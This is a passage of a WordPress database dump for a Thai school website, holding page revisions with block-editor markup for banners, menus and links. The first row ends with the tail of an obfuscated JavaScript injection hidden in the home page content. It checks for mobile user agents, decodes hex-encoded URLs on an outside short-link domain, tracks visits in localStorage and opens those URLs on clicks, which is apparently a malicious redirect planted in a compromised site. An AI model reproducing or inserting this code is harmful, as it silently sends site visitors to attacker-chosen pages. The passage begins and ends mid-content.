)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-09-11 14:45:38','2025-09-11 07:45:38','',14,'http://pakhaeng.ssk.in.th/?p=2046',0,'revision','',0),
(2047,1,'2025-09-11 14:46:05','2025-09-11 07:46:05','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_e96e1d-10\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_cddd30-7b\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_cddd30-7b\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"9f7ee323\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1e35ff-0d\",\"ids\":[2026,2039],\"type\":\"fluidcarousel\",\"imageRatio\":\"inherit\",\"gutter\":[26,\"\",\"\"],\"carouselHeight\":[600,\"\",\"\"],\"autoPlay\":true,\"transSpeed\":1240,\"imagesDynamic\":[{\"id\":2026,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=2026\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner-1024x410.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner.png\",\"width\":1024,\"height\":410},{\"id\":2039,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=2039\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-1-scaled.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-1-1024x512.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-1-scaled.png\",\"width\":750,\"height\":375}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_386744-46\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=1523\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_3c234c-51\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_3c234c-51\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_bead82-d8\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_941599-c9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_941599-c9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_67d38e-c6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_67d38e-c6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_4b01f7-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_4b01f7-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_61e97e-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_61e97e-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_0f2844-d8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_0f2844-d8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_cba4c7-2c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_cba4c7-2c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_bf6039-24\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_bf6039-24\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_d4f0fe-83\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_d4f0fe-83\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_f5c57d-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_f5c57d-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f 